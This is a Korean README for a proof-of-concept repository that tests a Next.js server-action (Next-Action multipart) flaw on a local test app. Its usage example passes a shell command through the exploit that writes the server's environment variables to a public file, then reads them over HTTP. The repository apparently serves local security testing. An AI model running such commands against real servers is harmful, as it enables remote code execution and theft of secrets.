
다음을 포함하는 소규모 저장소입니다:
test-app/: App Router를 사용하는 Next.js 16(React 19) 테스트 애플리케이션.exploit.js: multipart/Next-Action 처리와 관련된 서버 동작을 시연하고 테스트하는 로컬 PoC 스크립트. 로컬 테스트 전용입니다.rsc-test-app/
├─ README.md # You are here
├─ exploit.js # PoC script (local-only)
└─ test-app/ # Next.js application
├─ app/ # App Router pages
├─ public/ # Static assets (and env.txt when generated)
├─ package.json # Next 16 / React 19
└─ README.md # Default Next.js template README
cd test-app
npm install
npm run dev
# App will be available at http://localhost:3000
npm run build
npm start
이 스크립트는 Next-Action 헤더가 포함된 multipart 요청을 구성하여 서버 동작을 테스트합니다. 기본적으로 서버 프로세스에서 환경 변수를 public/env.txt에 기록하는 명령을 실행하려고 시도합니다(로컬/개발 환경에서 데모용).
중요 참고 사항:
public/이 test-app/public/ 아래에 위치하도록 정렬되어 있다고 가정합니다.별도의 터미널에서 Next.js 앱이 http://localhost:3000에서 실행 중인지 확인하세요:
cd test-app
npm run dev
저장소 루트에서 스크립트를 실행하세요:
node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"
매개변수:
http://localhost:3000입니다.sh -lc 'printenv > public/env.txt'입니다.실행 후 생성된 파일을 확인하세요:
다음 주소로 접근하세요:
http://localhost:3000/env.txt
그러면 서버의 환경 변수를 볼 수 있습니다.